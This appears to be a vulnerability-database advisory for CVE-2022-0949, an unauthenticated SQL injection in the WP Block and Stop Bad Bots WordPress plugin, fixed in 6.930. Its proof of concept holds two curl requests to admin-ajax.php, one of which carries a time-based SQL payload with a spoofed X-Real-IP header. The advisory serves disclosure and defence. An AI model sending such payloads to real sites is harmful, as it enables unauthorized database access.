WP Block and Stop Bad Bots < 6.930 – Unauthenticated SQLi | CVE 2022-0949 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection

Proof of Concept

curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=0' -H 'X-Real-IP: 1.1.1.36'

then

curl -i 'https://example.com/wp-admin/admin-ajax.php' --data 'action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(5))' -H 'X-Real-IP: 1.1.1.36'

Affects Plugins

Fixed in 6.930

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

a0fbb79a-e160-49df-9cf2-18ab64ea66cb

Timeline

Publicly Published

2022-03-16 (about 3 years ago)

Added

2022-03-16 (about 3 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2023-10-29

Title

ImageLinks Interactive Image Builder < 1.6.0 - Admin+ SQLi

Published

2023-12-28

Title

Page Generator < 1.7.2 - Authenticated(Administrator+) SQL Injection

Published

2023-04-17

Title

Avirato hotels online booking engine <= 5.0.5 - Subscriber+ SQLi

Published

2025-06-05

Title

WP Text Expander <= 1.0.1 - Authenticated (Administrator+) SQL Injection

Published

2015-11-24

Title

WP-Stats-Dashboard <= 2.9.4 - Authenticated Blind SQL Injection